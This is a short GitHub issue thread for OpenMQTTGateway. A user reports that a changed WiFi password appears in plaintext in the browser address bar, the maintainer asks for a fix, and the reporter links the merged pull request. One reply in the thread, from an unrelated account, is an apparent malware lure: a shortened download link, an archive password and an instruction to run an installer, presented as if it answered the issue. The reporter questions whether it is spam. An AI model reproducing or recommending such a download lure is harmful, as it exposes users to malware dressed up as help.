1technophile/OpenMQTTGateway #2027: When changing WiFi password, the password appears in plaintext in the browser address bar

puterboy, 2024-08-27:
I just noticed that after pressing `save` when changing the WiFi password, the SSID and password appear in **plaintext** in the browser address bar (and presumably go into your browser history too).
This seems like a security issue.
May also apply to MQTT and Gateway passwords but I didn't check.

I imagine data is being sent with an HTTP GET rather than POST.

c0ffincolors, 2024-08-27:
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

puterboy, 2024-08-27:
Is that spam????

1technophile, 2024-08-27:
> I imagine data is being sent with an HTTP GET rather than POST.

Agreed PR welcome to fix that

puterboy, 2024-08-29:
Fixed with:
https://github.com/1technophile/OpenMQTTGateway/pull/2037

closed 2024-08-29 by puterboy